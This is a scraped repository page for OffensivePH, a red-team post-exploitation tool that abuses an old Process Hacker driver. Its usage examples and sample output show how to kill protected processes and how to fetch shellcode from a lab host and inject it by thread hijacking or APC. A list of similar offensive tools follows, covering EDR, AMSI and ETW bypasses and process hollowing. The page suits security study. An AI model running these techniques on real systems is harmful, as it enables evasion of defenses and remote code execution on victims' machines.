OffensivePH - use old Process Hacker driver to bypass several user-mode access controls

Overview

offensiveph

OffensivePH is a post-exploitation tool that utilizes an old Process Hacker driver to bypass several user-mode access controls.

Usage

  • Compile OffensivePH with VS2019 (tested).
  • Execute with Admin privileges.
  • offensiveph.exe: Standalone tool that can be used as a shellcode loader or process killer.
  • Hook2Kph.dll: a DLL that can be injected into your process to redirect several standard API calls to IOCTLs. Tools like sRDI can be used to convert Hook2Kph.dll into shellcode and inject your attacker process.
  • OffensivePH will extract the old Process Hacker driver from its resource section into the current directory with the name kph.sys and create a service to install driver. After execution service and file should be deleted automatically.
offensivph.exe [-kill|-peb|-hijack|-apcinject] [<PID>] [<URL>]
	-kill		: Kill process (can kill PPLs)
	-peb		: Read PEB of a process
	-hijack		: Inject shellcode using thread execution hijacking
	-apcinject	: Inject shellcode into a new services.exe (WinTCB-PPL) instance
  • Kill processes
> offensiveph.exe -kill 8228
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[*] Trying to terminate pid: 8228
[+] KphTerminateProcess is SUCCESSFUL
[*] Service and file are removed
  • Inject shellcode by using Hijack Thread execution
> offensiveph.exe -hijack 8412 http://192.168.56.100/calc-clean.bin
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[+] Connecting to URL for downloading payload
[+] Process 8412 thread is hijacked to execute payload
[*] Service and file are removed
  • Inject shellcode into a new services.exe instance
> offensiveph.exe -apcinject http://192.168.56.100/calc-clean.bin
# OffensivePH
-------------------------------------------------
[*] Driver path: C:\Users\RedSection\kph.sys
[*] Connected to KprocessHacker Driver
[+] Process 652 token is duplicated as Impersonation Token!
[+] Connecting to URL for downloading payload
[+] Protected Shellcode Host Process: 6520
[*] Service and file are removed

References

This repo contains lots of codes and inspration from original Process Hacker code.

TODO

  • Reflective DLLs and C2 implementation
  • Hiding Kph Driver
You might also like...
A tool to apply accent color to win32 controls.
A tool to apply accent color to win32 controls.

AccentApplicator A tool to apply accent color to win32 controls. Works with Windows 10 only. Overall Progress Controls Button Checkbox Combobox Edit T

Corsair LL Access driver abuse

CorsairLLeak Map physical addresses into userspace (RW), read/write MSRs, send/recieve data on I/O ports, and query/set bus configuration data with th

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections and LSASS protections

EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections (Kernel callbacks and ETW TI provider) and LSASS protections. Multiple userland unhooking techniques are also implemented to evade userland monitoring.

Several single-file, cross-platform, public domain libraries for C/C++ that I use for learning / testing

HTC Several single-file, cross-platform, public domain libraries for C/C++ that I use for learning / testing (Not meant for production code). This is

If the button pressed esp will reset and App mode will on. App mode will on then led will on, network is connected led will off.

DHT22-to-Google-sheet-Reset-Using-ESP8266-LED-Switch If button pressed esp will reset and App mode will on. App mode will on then led will on, network

Process Ghosting - a PE injection technique, similar to Process Doppelgänging, but using a delete-pending file instead of a transacted file
Process Ghosting - a PE injection technique, similar to Process Doppelgänging, but using a delete-pending file instead of a transacted file

Process Ghosting This is my implementation of the technique presented by Gabriel Landau: https://www.elastic.co/blog/process-ghosting-a-new-executable

EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode
EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode

HOLLOW - Cobalt Strike BOF Authors: Bobby Cooke (@0xBoku) Justin Hamilton (@JTHam0) Octavio Paguaga (@OakTree__) Matt Kingstone (@n00bRage) Beacon Obj

x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration

anycall x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration Read: https://www.godeye.club/2021/05/14/0

A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses
A Windows user-mode shellcode execution tool that demonstrates various techniques that malware uses

Jektor Toolkit v1.0 This utility focuses on shellcode injection techniques to demonstrate methods that malware may use to execute shellcode on a victi

Comments
  • Failed to connect KProcessHacker Driver

    Failed to connect KProcessHacker Driver

    C:\Users\max\Desktop>offensiveph.exe -kill 4952

    OffensivePH


    [*] Driver path: C:\Users\max\Desktop\kph.sys [-] Failed to connect KProcessHacker Driver. Exiting... [*] Service and file are removed C:\Users\max\Desktop>

    opened by wgetnz 9
Owner
Red Section
Red Section
Loads a signed kernel driver which allows you to map any driver to kernel mode without any traces of the signed / mapped driver.

CosMapper Loads a signed kernel driver (signed with leaked cert) which allows you to map any driver to kernel mode without any traces of the signed /

null 141 Sep 20, 2022
ScriptHook Bypass For Fivem / bypass hardware ID For nvdia only

Fivem-Bypass ScriptHook Bypass For Fivem / bypass hardware ID For nvdia only Not Working? Run as admin and disable your antivirus. How to use 1. Put y

Sarnax 34 Oct 3, 2022
A user-mode emulator for the mhyprot2.sys driver

mhynot2 Cheating is bad, but I think requiring a kernel driver to play a (mostly) single-player game is worse. mhynot2 is a hook DLL which hooks into

Khangaroo 86 Sep 14, 2022
This repo contains example software for the Kernelcon 2021 Hack Live! badge - the Hacker HotKey.

Hacker HotKey This repo contains example software for the Kernelcon 2021 Hack Live! badge - the Hacker HotKey. Default Hotkey Mapping Hacker Hotkey is

Kernelcon 14 Jan 24, 2022
Remote hacker probe - Threat Emulation and Red Teaming Framework, The Hacking Software for normal people.

The Remote Hacker Probe is a Threat Emulation and Red Teaming Framework built to be easy to use. The Remote Hacker Probe is Feature Rich! Including, K

Fahad 170 Oct 1, 2022
Tools of The Trade, from Hacker News.

Hacker News Tools of the Trade Tools of The Trade, from Hacker News. Background In 2010, Joshua Schachter, the founder of Delicious, posted the follow

Chris Barber 15.7k Sep 26, 2022
Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.

Cobalt Strike BOF - Inject AMSI Bypass Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection. Running inje

boku 302 Sep 23, 2022
Automatically inject a DLL into the selected process with VAC3 bypass.

FTP LOADER Automatically inject a DLL into the selected process with VAC3 bypass. This will only, most likely, work only with source engine games in s

null 18 Aug 26, 2021
CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)

Cobalt Strike BOF - Inject ETW Bypass Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate) Running InjectEtwBypass BOF from Cobalt

Bobby Cooke 231 Sep 28, 2022
Sloth 🦥 is a coverage guided fuzzing framework for fuzzing Android Native libraries that makes use of libFuzzer and QEMU user-mode emulation

Sloth ?? Sloth is a fuzzing setup that makes use of libFuzzer and QEMU’s user-mode emulation (qemu/linux-user) on x86_64/aarch64 host to emulate aarch

Chaithu 78 Sep 18, 2022